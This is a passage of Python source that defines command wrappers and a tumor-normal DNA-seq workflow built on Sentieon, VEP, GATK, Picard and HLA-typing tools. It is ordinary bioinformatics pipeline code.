cmd.runtime.image = 'docker-reg.basebit.me:5000/pipelines/sentieon-joint-call:2019.11'\n cmd.runtime.tool = 'sentieon driver'\n cmd.args['t'] = Argument(prefix='-t ', default=16, desc='number of threads to use in computation, set to number of cores in the server')\n cmd.args['bam'] = Argument(prefix='-i ', type='infile', desc='input bam file')\n cmd.args['score'] = Argument(prefix='--algo LocusCollector --fun score_info ', desc='output score file', value=f'{sample}.score.txt')\n cmd.outputs['score'] = Output(value='{score}')\n return cmd\n\n\ndef dedup(sample):\n cmd = Command()\n cmd.meta.name = 'DeDup'\n cmd.runtime.image = 'docker-reg.basebit.me:5000/pipelines/sentieon-joint-call:2019.11'\n cmd.runtime.tool = 'sentieon driver'\n cmd.args['t'] = Argument(prefix='-t ', default=16, desc='number of threads to use in computation, set to number of cores in the server')\n cmd.args['bam'] = Argument(prefix='-i ', type='infile', desc='input bam file')\n cmd.args['_x'] = Argument(type='fix', value='--algo Dedup')\n cmd.args['score'] = Argument(prefix='--score_info ', type='infile', desc='score info file')\n cmd.args['dedup_metrics'] = Argument(prefix='--metrics ', desc='output metrics info file', value=f'{sample}.dedup.metrics.txt')\n cmd.args['deduped_bam'] = Argument(desc='output metrics info file', value=f'{sample}.deduped.bam')\n cmd.outputs['dedup_metrics'] = Output(value='{dedup_metrics}')\n cmd.outputs['out_bam'] = Output(value='{deduped_bam}')\n return cmd\n\n\ndef coverage_metrics(sample):\n cmd = Command()\n cmd.meta.name = 'CoverageMetrics'\n cmd.runtime.image = 'docker-reg.basebit.me:5000/pipelines/sentieon-joint-call:2019.11'\n cmd.runtime.tool = 'sentieon driver'\n cmd.args['t'] = Argument(prefix='-t ', default=16, desc='number of threads to use in computation, set to number of cores in the server')\n cmd.args['intervals'] = Argument(prefix='--interval ', level='optional', type='infile', 
multi_times=True, desc=\"interval file, support bed file or picard interval or vcf format\")\n cmd.args['ref'] = Argument(prefix='-r ', type='infile', desc='reference fasta file')\n cmd.args['bam'] = Argument(prefix='-i ', type='infile', desc='input bam file')\n cmd.args['coverage_metrics'] = Argument(prefix='--algo CoverageMetrics ', value=f'{sample}.cov.metrics.txt', desc='output coverage metrics file')\n cmd.outputs['coverage_metrics'] = Output(value=\"{coverage_metrics}\")\n return cmd\n\n\ndef realign(sample):\n cmd = Command()\n cmd.meta.name = 'realign'\n cmd.runtime.image = 'docker-reg.basebit.me:5000/pipelines/sentieon-joint-call:2019.11'\n cmd.runtime.tool = 'sentieon driver'\n cmd.args['t'] = Argument(prefix='-t ', default=16, desc='number of threads to use in computation, set to number of cores in the server')\n cmd.args['ref'] = Argument(prefix='-r ', type='infile', desc='reference fasta file')\n cmd.args['bam'] = Argument(prefix='-i ', type='infile', desc='input bam file')\n cmd.args._x = Argument(type='fix', value='--algo Realigner')\n cmd.args['database'] = Argument(prefix='-k ', type='infile', multi_times=True, desc='known indel vcf file')\n cmd.args['realigned_bam'] = Argument(desc='output realigned bam file', value=f'{sample}.realigned.bam')\n cmd.outputs['out_bam'] = Output(value='{realigned_bam}')\n return cmd\n\n\ndef recalibration(sample):\n cmd = Command()\n cmd.meta.name = 'recalibration'\n cmd.runtime.image = 'docker-reg.basebit.me:5000/pipelines/sentieon-joint-call:2019.11'\n cmd.runtime.tool = 'sentieon driver'\n cmd.args['t'] = Argument(prefix='-t ', default=16, desc='number of threads to use in computation, set to number of cores in the server')\n cmd.args['intervals'] = Argument(prefix='--interval ', level='optional', type='infile', multi_times=True, desc=\"interval file, support bed file or picard interval or vcf format\")\n cmd.args['ref'] = Argument(prefix='-r ', type='infile', desc='reference fasta file')\n cmd.args['bam'] = Argument(prefix='-i ', type='infile', desc='input bam file')\n cmd.args['_x'] = Argument(type='fix', value='--algo QualCal')\n cmd.args['database'] = Argument(prefix='-k ', type='infile', multi_times=True, desc='known indel vcf file')\n cmd.args['recal_data'] = Argument(desc=\"output recal_data.table\", value=f'{sample}.recal_data.table')\n cmd.outputs['recal_data'] = Output(value='{recal_data}')\n return cmd\n\n\ndef TNhaplotyper2(tumor_sample):\n cmd = Command()\n cmd.meta.name = 'TNhaplotyper2'\n cmd.runtime.image = 'docker-reg.basebit.me:5000/pipelines/sentieon-joint-call:2019.11'\n cmd.runtime.tool = 'sentieon driver'\n cmd.args['t'] = Argument(prefix='-t ', default=16, desc='number of threads to use in computation, set to number of cores in the server')\n cmd.args['intervals'] = Argument(prefix='--interval ', level='optional', type='infile', multi_times=True, desc=\"interval file, support bed file or picard interval or vcf format\")\n cmd.args['ref'] = Argument(prefix='-r ', type='infile', desc='reference fasta file')\n # basic inputs\n cmd.args['bams'] = Argument(prefix='-i ', type='infile', multi_times=True, desc='reccaled tumor and normal bam list')\n cmd.args['recal_datas'] = Argument(prefix='-q ', type='infile', multi_times=True, desc='tumor and normal recal data list')\n cmd.args['method'] = Argument(prefix='--algo ', value='TNhaplotyper2', type='fix')\n cmd.args['tumor_sample'] = Argument(prefix='--tumor_sample ', desc='tumor sample name', default=tumor_sample)\n cmd.args['normal_sample'] = 
Argument(prefix='--normal_sample ', desc='normal sample name', level='optional')\n # optional inputs\n cmd.args['germline_vcf'] = Argument(prefix='--germline_vcf ', type='infile', level='optional', desc='the location of the population germline resource')\n cmd.args['pon'] = Argument(prefix='--pon ', type='infile', level='optional', desc='the location and name of panel of normal VCF file')\n cmd.args['out_vcf'] = Argument(value=f'{tumor_sample}.TNhaplotyper2.vcf.gz', desc='output vcf file of TNhaplotyper2, this will be used later for filtering')\n # orientation\n cmd.args['orientation_sample'] = Argument(prefix='--algo OrientationBias --tumor_sample ', level='optional', desc='tumor sample name')\n cmd.args['orientation_data'] = Argument(level='optional', default=f'{tumor_sample}.orientation.data', desc='output orientation bias result file')\n # contamination, 如果无对照样本或者germline vcf,则无该项分析\n cmd.args['contamination_tumor'] = Argument(prefix=\"--algo ContaminationModel --tumor_sample \", level='optional', desc='tumor sample name', default=tumor_sample)\n cmd.args['contamination_normal'] = Argument(prefix=\"--normal_sample \", level='optional', desc='normal sample name')\n cmd.args['germline_vcf2'] = Argument(prefix='--vcf ', type='infile', level='optional', desc='the location of the population germline resource')\n cmd.args['tumor_segments'] = Argument(prefix='--tumor_segments ', level='optional', default=f'{tumor_sample}.contamination.segments', desc='output file name of the file containing the tumor segments information produced by ContaminationModel')\n cmd.args['contamination_data'] = Argument(level='optional', default=f'{tumor_sample}.contamination.data', desc='output file containing the contamination information produced by ContaminationModel')\n cmd.outputs['out_vcf'] = Output(value='{out_vcf}')\n cmd.outputs['orientation_data'] = Output(value='{orientation_data}')\n cmd.outputs['tumor_segments'] = Output(value='{tumor_segments}')\n cmd.outputs['contamination_data'] = Output(value='{contamination_data}')\n return cmd\n\n\ndef TNfilter(tumor_sample):\n cmd = Command()\n cmd.meta.name = 'TNfilter'\n cmd.runtime.image = 'docker-reg.basebit.me:5000/pipelines/sentieon-joint-call:2019.11'\n cmd.runtime.tool = 'sentieon driver'\n cmd.args['ref'] = Argument(prefix='-r ', type='infile', desc='reference fasta file')\n cmd.args['method'] = Argument(type='fix', value='--algo TNfilter')\n cmd.args['tumor_sample'] = Argument(prefix='--tumor_sample ', desc='tumor sample name', default=tumor_sample)\n cmd.args['normal_sample'] = Argument(prefix='--normal_sample ', level='optional', desc='normal sample name')\n cmd.args['tmp_vcf'] = Argument(prefix='-v ', type='infile', desc='vcf file from TNhaplotyper2')\n cmd.args['contamination'] = Argument(prefix='--contamination ', type='infile', level='optional', desc='file containing the contamination information produced by ContaminationModel')\n cmd.args['tumor_segments'] = Argument(prefix='--tumor_segments ', type='infile', level='optional', desc='file containing the tumor segments information produced by ContaminationModel')\n cmd.args['orientation_data'] = Argument(prefix='--orientation_priors ', type='infile', level='optional', desc='file containing the orientation bias information produced by OrientationBias')\n cmd.args['out_vcf'] = Argument(desc='final output vcf', value=f'{tumor_sample}.somatic.vcf.gz')\n cmd.outputs['out_vcf'] = Output(value='{out_vcf}')\n return cmd\n\n\ndef Haplotyper(normal_sample):\n cmd = Command()\n cmd.meta.name = 'Haplotyper'\n 
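The somatic branch follows the same pattern: TNhaplotyper2's four outputs map one-to-one onto TNfilter's optional inputs. A hedged wiring sketch under the same assumption as the chain above:

tn2 = TNhaplotyper2("tumor")
tnfilter = TNfilter("tumor")

tnfilter.args["tmp_vcf"].value = tn2.outputs["out_vcf"]
tnfilter.args["orientation_data"].value = tn2.outputs["orientation_data"]
tnfilter.args["contamination"].value = tn2.outputs["contamination_data"]
tnfilter.args["tumor_segments"].value = tn2.outputs["tumor_segments"]
# tnfilter's args define "<tumor>.somatic.vcf.gz" as the final filtered VCF.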
cmd.runtime.image = 'registry-xdp-v3-yifang.xdp.basebit.me/basebitai/sentieon:202010.02'\n    cmd.runtime.tool = 'sentieon driver'\n    cmd.args['intervals'] = Argument(prefix='--interval ', level='optional', type='infile', multi_times=True, desc=\"interval file, support bed file or picard interval or vcf format\")\n    cmd.args['bam'] = Argument(prefix='-i ', type='infile', desc='recalibrated tumor and normal bam list')\n    cmd.args['recal_data'] = Argument(prefix='-q ', type='infile', desc='tumor and normal recal data list')\n    cmd.args['ref'] = Argument(prefix='-r ', type='infile', desc='reference fasta file')\n    cmd.args['method'] = Argument(type='fix', value='--algo Haplotyper')\n    cmd.args['emit_mode'] = Argument(prefix='--emit_mode ', default='gvcf', desc='determines what calls will be emitted. possible values: variant, confident, all, gvcf')\n    cmd.args['ploidy'] = Argument(prefix='--ploidy ', type='int', default=2, desc='determines the ploidy number of the sample being processed. The default value is 2.')\n    cmd.args['out_vcf'] = Argument(value=f'{normal_sample}.g.vcf.gz', desc='output vcf file')\n    cmd.outputs['out_vcf'] = Output(value='{out_vcf}')\n    cmd.outputs['out_vcf_idx'] = Output(value='{out_vcf}.tbi')\n    return cmd\n\n\ndef GVCFtyper(normal_sample):\n    cmd = Command()\n    cmd.meta.name = 'GVCFtyper'\n    cmd.runtime.image = 'registry-xdp-v3-yifang.xdp.basebit.me/basebitai/sentieon:202010.02'\n    cmd.runtime.tool = 'sentieon driver'\n    cmd.args['ref'] = Argument(prefix='-r ', type='infile', desc='reference fasta file')\n    cmd.args['method'] = Argument(type='fix', value='--algo GVCFtyper')\n    cmd.args['in_gvcf'] = Argument(prefix='-v ', type='infile', multi_times=True, desc='input gvcf file')\n    cmd.args['known_dbsnp'] = Argument(prefix='-d ', type='infile', desc='dbsnp file')\n    cmd.args['call_conf'] = Argument(prefix='--call_conf ', type='int', default=30, desc=\"determine the threshold of variant quality to emit a variant. Variants with quality less than CONFIDENCE will not be added to the output VCF file.\")\n    cmd.args['genotype_model'] = Argument(prefix='--genotype_model ', range={\"coalescent\", \"multinomial\"}, default='multinomial', desc=\"determines which model to use for genotyping and QUAL calculation\")\n    cmd.args['out_vcf'] = Argument(value=f'{normal_sample}.germline.vcf.gz', desc='output vcf file')\n    cmd.outputs['out_vcf'] = Output(value='{out_vcf}')\n    cmd.outputs['out_vcf_idx'] = Output(value='{out_vcf}.tbi')\n    return cmd\n\n\ndef vep(sample):\n    cmd = Command()\n    cmd.meta.name = 'VEP'\n    cmd.runtime.image = 'ensemblorg/ensembl-vep:2.0.3'\n    cmd.runtime.tool = 'vep'\n    cmd.args['input_file'] = Argument(prefix='-i ', type='infile', desc='input file')\n    cmd.args['fasta'] = Argument(prefix='--fasta ', type='infile', desc=\"Specify a FASTA file or a directory containing FASTA files to use to look up reference sequence. The first time you run VEP with this parameter an index will be built which can take a few minutes. This is required if fetching HGVS annotations (--hgvs) or checking reference sequences (--check_ref) in offline mode (--offline), and optional with some performance increase in cache mode (--cache).\")\n    cmd.args['output_file'] = Argument(prefix='-o ', default=f'{sample}.vep.vcf.gz', desc='output file')\n    cmd.args['output_format'] = Argument(prefix='--', range={'vcf', 'json', 'tab'}, default='vcf', desc=\"If we choose to write output in VCF format, consequences are added in the INFO field of the VCF file, using the key 'CSQ'. 
Data fields are encoded separated by '|'; the order of fields is written in the VCF header. Output fields in the 'CSQ' INFO field can be selected by using --fields.\")\n    cmd.args['compress_output'] = Argument(prefix='--compress_output ', default='bgzip', desc=\"Writes output compressed using either gzip or bgzip\")\n    cmd.args['force_overwrite'] = Argument(prefix=\"--force_overwrite \", type='bool', default=True, desc=\"Force overwriting of output file\")\n    cmd.args['fork'] = Argument(prefix='--fork ', type='int', default=7, desc='Use forking (multi-cpu/threads) to improve script runtime')\n    cmd.args['species'] = Argument(prefix='--species ', default='homo_sapiens', desc='Species for your data. This can be the latin name e.g. homo_sapiens or any Ensembl alias e.g. mouse.')\n    cmd.args['assembly_version'] = Argument(prefix='--assembly ', default='GRCh37', desc='Select the assembly version to use if more than one available.')\n    cmd.args['dir_cache'] = Argument(prefix='--dir_cache ', type='indir', desc='Specify the cache directory to use')\n    cmd.args['dir_plugins'] = Argument(prefix='--dir_plugins ', type='indir', desc='Specify the plugin directory to use')\n    cmd.args['stats_file'] = Argument(prefix='--stats_file ', default=f'{sample}.vep.summary.html', desc='Summary stats file name. This is an HTML file containing a summary of the VEP run - the file name must end with <.html>.')\n    cmd.args['cache'] = Argument(prefix='--cache ', type='bool', default=True, desc='Enables use of cache')\n    cmd.args['offline'] = Argument(prefix='--offline ', type='bool', default=True, desc='Enables offline mode. No database connections, and a cache file or GFF/GTF file is required for annotation')\n    cmd.args['merged'] = Argument(prefix='--merged ', type='bool', default=False, desc='Use the merged Ensembl and RefSeq cache. Consequences are flagged with the SOURCE of each transcript used.')\n    cmd.args['plugins'] = Argument(prefix='--plugin ', multi_times=True, default=['Frameshift', 'Wildtype'], desc='Use named plugin. Plugin modules should be installed in the Plugins subdirectory of the VEP cache directory. Multiple plugins can be used by supplying the --plugin flag multiple times')\n    cmd.args['variant_class'] = Argument(prefix='--variant_class ', type='bool', default=True, desc='Output the Sequence Ontology variant class.')\n    cmd.args['sift'] = Argument(prefix='--sift ', default='b', range={'p', 's', 'b'}, desc=\"SIFT (species limited) predicts whether an amino acid substitution affects protein function based on sequence homology and the physical properties of amino acids. VEP can output the prediction term, score or both.\")\n    cmd.args['polyphen'] = Argument(prefix='--polyphen ', default='b', range={'p', 's', 'b'}, desc=\"PolyPhen (human only) is a tool which predicts possible impact of an amino acid substitution on the structure and function of a human protein using straightforward physical and comparative considerations. VEP can output the prediction term, score or both.\")\n    cmd.args['nearest'] = Argument(prefix='--nearest ', default='transcript', range={'transcript', 'gene', 'symbol'}, desc='Retrieve the transcript or gene with the nearest protein-coding transcription start site (TSS) to each input variant. Use transcript to retrieve the transcript stable ID, gene to retrieve the gene stable ID, or symbol to retrieve the gene symbol. 
Note that the nearest TSS may not belong to a transcript that overlaps the input variant, and more than one may be reported in the case where two are equidistant from the input coordinates.')\n    cmd.args['gene_phenotype'] = Argument(prefix='--gene_phenotype ', type='bool', default=True, desc='Indicates if the overlapped gene is associated with a phenotype, disease or trait.')\n    cmd.args['regulatory'] = Argument(prefix='--regulatory ', type='bool', default=True, desc=\"Look for overlaps with regulatory regions. VEP can also report if a variant falls in a high information position within a transcription factor binding site. Output lines have a Feature type of RegulatoryFeature or MotifFeature.\")\n    cmd.args['phased'] = Argument(prefix='--phased ', type='bool', default=True, desc=\"Force VCF genotypes to be interpreted as phased. For use with plugins that depend on phased data.\")\n    cmd.args['numbers'] = Argument(prefix='--numbers ', type='bool', default=True, desc=\"Adds affected exon and intron numbering to the output. Format is Number/Total\")\n    cmd.args['hgvs'] = Argument(prefix='--hgvs ', type='bool', default=True, desc=\"Add HGVS nomenclature based on Ensembl stable identifiers to the output. Both coding and protein sequence names are added where appropriate.\")\n    cmd.args['transcript_version'] = Argument(prefix='--transcript_version ', type='bool', default=True, desc=\"Add version numbers to Ensembl transcript identifiers\")\n    cmd.args['symbol'] = Argument(prefix='--symbol ', type='bool', default=True, desc=\"Adds the gene symbol (e.g. HGNC) (where available) to the output.\")\n    cmd.args['tsl'] = Argument(prefix='--tsl ', type='bool', default=True, desc=\"Adds the transcript support level for this transcript to the output.\")\n    cmd.args['canonical'] = Argument(prefix='--canonical ', type='bool', default=True, desc=\"Adds a flag indicating if the transcript is the canonical transcript for the gene\")\n    cmd.args['biotype'] = Argument(prefix='--biotype ', type='bool', default=True, desc=\"Adds the biotype of the transcript or regulatory feature.\")\n    cmd.args['max_af'] = Argument(prefix='--max_af ', type='bool', default=True, desc=\"Report the highest allele frequency observed in any population from 1000 genomes, ESP or gnomAD\")\n    cmd.args['af_1kg'] = Argument(prefix='--af_1kg ', type='bool', default=True, desc=\"Add allele frequency from continental populations (AFR,AMR,EAS,EUR,SAS) of 1000 Genomes Phase 3 to the output.\")\n    cmd.args['af_gnomad'] = Argument(prefix='--af_gnomad ', type='bool', default=True, desc=\"Include allele frequency from Genome Aggregation Database (gnomAD) exome populations. Note only data from the gnomAD exomes are included\")\n    cmd.args['af_esp'] = Argument(prefix='--af_esp ', type='bool', default=False, desc=\"Include allele frequency from NHLBI-ESP populations.\")\n    cmd.args['coding_only'] = Argument(prefix='--coding_only ', type='bool', default=False, desc=\"Only return consequences that fall in the coding regions of transcripts. Not used by default\")\n    cmd.args['pick'] = Argument(prefix='--pick ', type='bool', default=False, desc=\"Pick one line or block of consequence data per variant, including transcript-specific columns. 
This is the best method to use if you are interested only in one consequence per variant\")\n    cmd.args['flag_pick'] = Argument(prefix='--flag_pick ', type='bool', default=True, desc=\"As per --pick, but adds the PICK flag to the chosen block of consequence data and retains others.\")\n    cmd.args['filter_common'] = Argument(prefix='--filter_common ', type='bool', default=False, desc=\"Shortcut flag for the filters below - this will exclude variants that have a co-located existing variant with global AF > 0.01 (1%). May be modified using any of the following freq_* filters.\")\n    cmd.args['other_args'] = Argument(default='', desc='specify other arguments that you want to append to the command')\n    cmd.args['_create_index'] = Argument(value='&& tabix *vcf.gz', type='fix')\n    cmd.outputs['out_vcf'] = Output(value='{output_file}')\n    cmd.outputs['out_vcf_idx'] = Output(value='{output_file}.tbi')\n    return cmd\n\n\ndef CombineVariants(tumor_sample):\n    cmd = Command()\n    cmd.meta.name = 'CombineVariants'\n    cmd.meta.desc = \"Combine variants\"\n    cmd.runtime.image = 'broadinstitute/gatk3:3.8-1'\n    cmd.runtime.tool = 'java -Xmx10g -jar GenomeAnalysisTK.jar -T CombineVariants'\n    cmd.args['ref'] = Argument(prefix='-R ', type='infile', desc='reference fasta file')\n    cmd.args['variant'] = Argument(prefix='--variant ', multi_times=True, type='infile', desc='variant vcf file array')\n    cmd.args['out_vcf'] = Argument(prefix='-o ', value=f'{tumor_sample}.combined_germline.vcf')\n    cmd.args['assumeIdenticalSamples'] = Argument(prefix='--assumeIdenticalSamples', type='bool', desc='If true, assume input VCFs have identical sample sets and disjoint calls. This option allows the user to perform a simple merge (concatenation) to combine the VCFs.')\n    cmd.outputs['combined_vcf'] = Output(value='{out_vcf}')\n    return cmd\n\n\ndef SortVcf(tumor_sample):\n    cmd = Command()\n    cmd.meta.name = 'SortVcf'\n    cmd.meta.desc = \"sort vcf\"\n    cmd.runtime.image = 'broadinstitute/picard:latest'\n    cmd.runtime.tool = 'java -jar /usr/picard/picard.jar SortVcf'\n    cmd.args['in_vcf'] = Argument(prefix='I=', type='infile', desc='input vcf to sort')\n    cmd.args['out_vcf'] = Argument(prefix='O=', value=f'{tumor_sample}.combined_germline.sorted.vcf', type='infile', desc='output sorted vcf')\n    cmd.outputs['sorted_vcf'] = Output(value='{out_vcf}')\n    return cmd\n\n\ndef ReadBackedPhasing(tumor_sample):\n    cmd = Command()\n    cmd.meta.name = 'ReadBackedPhasing'\n    cmd.meta.desc = \"ReadBackedPhasing\"\n    cmd.runtime.image = 'broadinstitute/gatk3:3.8-1'\n    cmd.runtime.tool = 'java -Xmx10g -jar GenomeAnalysisTK.jar -T ReadBackedPhasing'\n    cmd.args['ref'] = Argument(prefix='-R ', type='infile', desc='reference fasta file')\n    cmd.args['bam'] = Argument(prefix='-I ', type='infile', desc='tumor bam file')\n    cmd.args['variant'] = Argument(prefix='--variant ', type='infile', desc='input vcf file')\n    cmd.args['interval'] = Argument(prefix='-L ', type='infile', desc='interval file restricting the phasing analysis')\n    cmd.args['out_vcf'] = Argument(prefix='-o ', value=f'{tumor_sample}.phased.vcf', desc='output vcf file')\n    cmd.outputs['phased_vcf'] = Output(value='{out_vcf}')\n    return cmd\n\n\ndef HLA_ABC_typer(sample):\n    cmd = Command()\n    cmd.meta.name = 'OptiType'\n    cmd.meta.desc = \"OptiType:4-digit HLA typer\"\n    cmd.runtime.image = 'fred2/optitype:1.3.1'\n    cmd.runtime.tool = 'OptiTypePipeline.py'\n    cmd.args['reads'] = Argument(prefix='--input ', type='infile', array=True, desc='fastq file(s) (fished or raw) or .bam files stored for re-use, generated by an earlier OptiType run.')\n    cmd.args['is_dna'] 
= Argument(prefix='--dna', type='bool', default=True, desc='use with DNA sequencing data')\n    cmd.args['is_rna'] = Argument(prefix='--rna', type='bool', default=False, desc='use with RNA sequencing data')\n    cmd.args['enumerate'] = Argument(prefix='--enumerate ', type='int', default=1, desc='Number of enumerations. OptiType will output the optimal solution and the top N-1 suboptimal solutions in the results CSV.')\n    cmd.args['outdir'] = Argument(prefix='--outdir ', default='.', desc='Specifies the out directory to which all files should be written.')\n    cmd.args['prefix'] = Argument(prefix='--prefix ', value=sample, desc='prefix of output files')\n    cmd.args['config'] = Argument(prefix='--config ', default='config.ini', desc='config.ini file')\n    cmd.outputs['result_tsv'] = Output(value='{prefix}_result.tsv')\n    cmd.outputs['result_pdf'] = Output(value='{prefix}_coverage_plot.pdf')\n    return cmd\n\n\ndef hisat_genotype():\n    \"\"\"\n    hisatgenotype --base hla --locus-list A,B,C,DRB1,DQA1 -1 ILMN/NA12892.extracted.1.fq.gz -2 ILMN/NA12892.extracted.2.fq.gz\n    hisatgenotype_toolkit parse-results --csv --in-dir hisatgenotype_out\n    \"\"\"\n    cmd = Command()\n    cmd.meta.name = 'HisatGenotype'\n    cmd.meta.desc = \" HLA-typing using hisat\"\n    cmd.runtime.image = ''\n    cmd.runtime.tool = 'hisatgenotype'\n    cmd.runtime.cpu = 6\n    cmd.runtime.memory = 8*1024**3\n    cmd.args['base'] = Argument(prefix='--base ', default='hla', desc='Base file name for index, variants, haplotypes, etc. (e.g. hla, rbg, codis)')\n    cmd.args['locus'] = Argument(prefix='--locus-list ', level='optional', array=True, delimiter=',', desc='A comma-separated list of gene names (default: empty, all genes)')\n    cmd.args['read1'] = Argument(prefix='-1 ', type='infile', desc='read1 fastq file')\n    cmd.args['read2'] = Argument(prefix='-2 ', type='infile', desc='read2 fastq file')\n    cmd.args['_read_dir'] = Argument(prefix='--in-dir ', value='/', type='fix')\n    cmd.args['threads'] = Argument(prefix='--threads ', default=5, desc='Number of threads')\n    cmd.args['hisat_threads'] = Argument(prefix='--pp ', default=7, desc='Number of threads')\n    cmd.args['indicies'] = Argument(prefix='--index_dir ', level='optional', type='indir', desc=\"Set location to use for indices\")\n    cmd.args['_outdir'] = Argument(prefix='--out-dir ', value='./', type='fix')\n    cmd.args['_parse_result'] = Argument(value='&& hisatgenotype_toolkit parse-results --csv --in-dir .', type='fix')\n    cmd.args['level'] = Argument(prefix='-t ', default=2, desc='Trim allele to specific field level (example : A*01:01:01:01 trim 2 A*01:01)')\n    cmd.args['out'] = Argument(prefix='--output-file ', desc='output of csv file')\n    cmd.outputs['out'] = Output(value='{out}', type='outfile')\n    return cmd\n\n\ndef pipeline():\n    wf = Workflow()\n    wf.meta.name = 'DNAseqPipeline'\n    wf.meta.desc = 'typical bioinformatics pipeline using sentieon TNSeq and VEP, including HLA-typing'\n    wf.init_argparser()\n    wf.add_argument('-fastq_info', nargs='+', required=True, help='A list with elements from [fastq file, fastq parent dir, fastq_info.txt, fastq_info.json]')\n    wf.add_argument('-r1_name', default='(.*).R1.fastq', help=\"python regExp that describes the full name of read1 fastq file name. It requires at least one pair of parentheses, and the string matched in the first pair will be used as the sample name. Example: '(.*).R1.fq.gz'\")\n    wf.add_argument('-r2_name', default='(.*).R2.fastq', help=\"python regExp that describes the full name of read2 fastq file name. 
It requires at least one pair of parentheses, and the string matched in the first pair will be used as the sample name. Example: '(.*).R2.fq.gz'\")\n    wf.add_argument('-exclude_samples', default=tuple(), nargs='+', help='samples to exclude from analysis')\n    wf.add_argument('-pair_info', required=True, help='tumor normal pair info, two-column txt file, first column is tumor sample name. samples not in pair info will be skipped')\n    wf.add_argument('-sentieon_threads', default=4, help='number of threads used in sentieon')\n    wf.add_argument('--realign', default=False, action='store_true', help='whether to realign indel regions')\n    wf.add_argument('-ref', required=True, help='reference fasta file, require bwa index being created')\n    wf.add_argument('-dbsnp', required=True, help='dbsnp vcf file')\n    wf.add_argument('-known_indels', required=True, help='high confidence known indel vcf file')\n    wf.add_argument('-known_mills', required=True, help='high confidence known indel vcf file')\n    wf.add_argument('-pon', required=False, help='panel of normal vcf file for germline variant filtering, this will be required for tumor only analysis')\n    wf.add_argument('-germline_vcf', required=False, help='germline vcf, will be used for germline variant filtering and contamination analysis')\n    wf.add_argument('-vep_cache_dir', required=False, help='VEP cache directory')\n    wf.add_argument('-vep_plugin_dir', required=False, help='VEP plugin directory')\n    wf.add_argument('-intervals', required=False, help=\"interval file, support bed file or picard interval or vcf format. If this argument is not provided, it is recommended to skip the coverage analysis\")\n    wf.add_argument('-hisatgenotype_db', required=False, help='indices dir of hisat-genotype for HLA typing')\n    wf.parse_args()\n\n    top_vars = dict(\n        thread_number=TopVar(value=wf.args.sentieon_threads, type='int'),\n        ref=TopVar(value=wf.args.ref, type='infile'),\n        known_dbsnp=TopVar(value=wf.args.dbsnp, type='infile'),\n        known_indels=TopVar(value=wf.args.known_indels, type='infile'),\n        known_mills=TopVar(value=wf.args.known_mills),\n        pon=TopVar(value=wf.args.pon),\n        germline_vcf=TopVar(value=wf.args.germline_vcf),\n        vep_cache_dir=TopVar(value=wf.args.vep_cache_dir, type='indir'),\n        vep_plugin_dir=TopVar(value=wf.args.vep_plugin_dir, type='indir'),\n        intervals=TopVar(value=wf.args.intervals, type='infile'),\n        hisatgenotype_db=TopVar(value=wf.args.hisatgenotype_db, type='infile')\n    )\n    wf.add_topvars(top_vars)\n\n    fastq_info = get_fastq_info(fastq_info=wf.args.fastq_info, r1_name=wf.args.r1_name, r2_name=wf.args.r2_name)\n    if len(fastq_info) <= 0:\n        raise Exception('No fastq file found !')\n\n    pair_list = []\n    sample_list = []\n    if wf.args.pair_info:\n        with open(wf.args.pair_info) as f:\n            for line in f:\n                if line.strip():\n                    pairs = line.strip('\\n').split('\\t')[:2]\n                    pair_list.append(pairs)\n                    sample_list.extend(pairs)\n\n    recal_dict = dict()\n    bam_dict = dict()\n    # batch is the grouping info, used for wdl's scatter decision\n    for sample, (r1s, r2s) in fastq_info.items():\n        if sample in wf.args.exclude_samples or (sample not in sample_list):\n            continue\n        if len(r1s) > 1:\n            print(f'Warn: We can use only one fastq file of {sample}, you should merge them first.')\n        read1 = r1s[0]  # assume each sample has exactly one pair of fastq files; no one-to-many case\n        read2 = r2s[0]  # assume each sample has exactly one pair of fastq files; no one-to-many case\n\n        # fastp\n        fastp_task, args = wf.add_task(fastp(sample), name=f'fastp-{sample}')\n        args['read1'].value = TmpVar(name='read1', value=read1, type='infile')\n        args['read2'].value = TmpVar(name='read2', value=read2, type='infile')\n\n        # optiType\n        # task, args = wf.add_task(HLA_ABC_typer(sample), 
name=f'optiType-{sample}', depends=[fastp_task.task_id])\n        # args['reads'].value = [fastp_task.outputs['out1'], fastp_task.outputs['out2']]\n\n        # hisat-genotype\n        if wf.args.hisatgenotype_db:\n            task, args = wf.add_task(hisat_genotype(), name=f'hisatGenotype-{sample}', depends=[fastp_task.task_id])\n            args['read1'].value = fastp_task.outputs['out1']\n            args['read2'].value = fastp_task.outputs['out2']\n            args['indicies'].value = top_vars['hisatgenotype_db']\n            args['out'].value = f'{sample}.HLA-gene-type.txt'\n\n        # mapping\n        mapping, args = wf.add_task(bwa_mem(sample, platform='ILLUMINA'), name=f'bwaMem-{sample}', depends=[fastp_task.task_id])\n        args['t'].value = top_vars['thread_number']\n        args['ref'].value = top_vars['ref']\n        args['ref2'].value = top_vars['ref']\n        args['read1'].value = fastp_task.outputs['out1']\n        args['read2'].value = fastp_task.outputs['out2']\n        args['t2'].value = top_vars['thread_number']\n\n        # get_metrics\n        task, args = wf.add_task(get_metrics(sample), name=f'getMetrics-{sample}', depends=[mapping.task_id])\n        args['intervals'].value = [top_vars['intervals']]\n        args['t'].value = top_vars['thread_number']\n        args['ref'].value = top_vars['ref']\n        args['bam'].value = mapping.outputs['out']\n        get_metrics_task_id = task.task_id\n\n        # plot\n        depend_task = task\n        task, args = wf.add_task(plot_metrics(sample, method='GCBias'), name=f'plotGCBias-{sample}', depends=[get_metrics_task_id])\n        task.cmd.meta.name = 'plotGCBias'\n        args['i'].value = depend_task.outputs['gc_metrics']\n\n        task, args = wf.add_task(plot_metrics(sample, method='MeanQualityByCycle'), name=f'plotMeanQual-{sample}', depends=[get_metrics_task_id])\n        task.cmd.meta.name = 'plotMeanQualityByCycle'\n        args['i'].value = depend_task.outputs['mq_metrics']\n\n        task, args = wf.add_task(plot_metrics(sample, method='QualDistribution'), name=f'plotQualDistr-{sample}', depends=[get_metrics_task_id])\n        task.cmd.meta.name = 'plotQualDistribution'\n        args['i'].value = depend_task.outputs['qd_metrics']\n\n        task, args = wf.add_task(plot_metrics(sample, method='InsertSizeMetricAlgo'), name=f'plotInsertSize-{sample}', depends=[get_metrics_task_id])\n        task.cmd.meta.name = 'plotInsertSize'\n        args['i'].value = depend_task.outputs['insert_metrics']\n\n        # locus\n        locus_get, args = wf.add_task(locus_collector(sample), name=f'locusCollector-{sample}', depends=[mapping.task_id])\n        args['t'].value = top_vars['thread_number']\n        args['bam'].value = mapping.outputs['out']\n\n        # dedup\n        dedup_task, args = 